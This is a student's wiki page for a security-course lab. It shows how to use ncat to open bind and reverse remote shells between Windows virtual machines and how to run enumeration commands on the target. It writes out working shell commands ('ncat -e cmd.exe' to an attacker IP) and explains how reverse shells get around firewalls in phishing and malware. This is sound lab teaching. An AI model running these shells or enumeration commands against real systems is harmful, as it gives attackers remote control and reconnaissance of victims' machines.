Week 6 Popping Shells - devinziegler/Devin-Tech-Journal GitHub Wiki
Assignment: Week 6 - Using ncat to obtain a shell, exfiltrate data
In this lab we used ncat to start a listener on the target system. Then the attacking computer can connect to the target computer.
- Command For Target System:
ncat -l 8001 -e cmd.exe -v
-l means listener
-v is verbose mode (shows information on shell setup)
- Command For Attacking System:
ncat <target IP> 8001
8001 is the port that we will be connecting to
The attacker is now logged into the target system and can execute commands. However this first example only works on system with no firewall.
In this example the target system has a firewall enabled and does not allow inbound traffic. This takes advantage of the firewall still allowing outbound traffic. The target system will have to open a file that connects back to the attacking system.
- Attacker starts listener:
ncat -l 8080 -vv
- Target System Will Connect To Attacker:
ncat -vv <attacker IP>
The attacker is now logged into the target system and can execute commands. This example evades most firewalls because it takes advantage of outbound traffic.
Examine and test how threat actors obtain a shell on a remote computer.
NOTE: This lab is similar to what you did when you used Metasploit to exploit your Windows XP system.
It is important to understand how attackers are able to obtain a shell on a remote system since it is a common method of maintaining access and stealing data (exfiltration or exfil). Notice that they are able to use any arbitrary port.
- Each person must change the Network Adapter on their Windows 10 Virtual Machine to “NETSEC-WAN”
- You may have to run: ipconfig /release ; ipconfig/renew
- You should have an IP address in the 10.0.16.XXX range
- Download nmap on your Windows 10 Virtual Machine: https://nmap.org/dist/nmap-7.93-setup.exe
Assume two systems can directly communicate to each other on an arbitrary port (ie. there's no firewall or other device preventing them from communicating directly to each other.) Alice is the victim and Eve is the attacker so one of you will be Alice for the duration of the assignment and the other one Eve. When the first person is done with this lab, switch roles.
- Make a note of each other’s IP address.
- Ensure the two Windows workstations can ping each other and disable the firewall on both hosts.
Goal: On Alice’s computer, a _listener _(-l) (lower case L) is started on port 8001 and anyone that connects to it will get a command prompt on Alice's computer. The -v is for _verbose _mode. It is always a good option so you know what is going on as the shell is being set up.
Alice (Type the command): ncat -l 8001 -e cmd.exe -v
Eve Connects to Alice's computer on port 8001.
Eve (Type the command):** ncat X.X.X.X 8001**
Replace X.X.X.X with the IP address of Alice’s computer.
Eve should now see something like this:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Program Files\Nmap>
Eve is now logged into Alice's system and can type commands as if she was sitting in front of Alice’s computer.
Run the command:
ipconfig /all
which should display the IP address of the windows system of your Partner.
Learn how attackers can bypass firewalls when there is no direct communication from the attacker’s computer to the victim’s computer.
In this scenario, the attacker has control over their computer so that is why the attacker disables their firewall. It is to simulate the attacker can decide which port to use and open on their system.
This attack is how phishing campaigns work that trick someone into opening a document and the attacker obtains a shell on their computer. The victim is behind a corporate firewall so Even CANNOT connect directly to Alice. Instead, Alice is tricked into opening a document that connects back to Eve’s computer.
Alice is behind a firewall so Eve can't connect directly to her computer.
- Alice, change your Windows 10 Network Adapater and set it back to your LAN segment.
- Alice enable your Windows 10 firewall.
- Eve, keep your Windows 10 Network Adapater on the NETSEC-WAN segment.
NOTE: When you switch roles, don’t forget to change your network adapters accordingly.
Eve will start her listener:
Eve (run the command): ncat -l 8080 -vv
Alice connects to Eve and gives her computer’s command prompt to Eve. The **-e **means execute. In this case, when Alice connects to Eve, Alice will execute the command cmd.exe and push the (command prompt aka shell) over to Eve.
Alice: ncat -vv X.X.X.X 8080 -e cmd.exe
Eve should see something like this on her screen:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Program Files\Nmap>
You can check by typing:
ipconfig
and it should print the IP address of Alice’s computer.
Type some other commands used to enumerate a remote computer. NOTE: Don’t type the # and test. Type the commands in bold.
net users
net view
net users /DOMAIN
tasklist
tasklist /svc
arp -a
wmic product get name, version, installlocation
wmic process
wmic os
wmic useraccount
systeminfo
All the commands you are running is part of the process of enumeration. If an attacker can run these types of arbitrary commands, they are beginning the process of scoping out your organization.
BE SURE YOU UNDERSTAND HOW THIS WORKS.
This evades most firewalls because most firewalls are configured to allow any outbound traffic. Since Eve controls the computer on her end, she can allow Alice to connect to any port on her computer. Even if Alice is behind a restrictive firewall that allows port 80 outbound, Eve can allow her to connect to her computer on Port 80 using the same commands above, except 8080 will become 80.
This is similar to how Malware works. It executes a command and connects back to the attacker's computer system. Just as in the command above, the malware can push the victim's shell back to the attacker.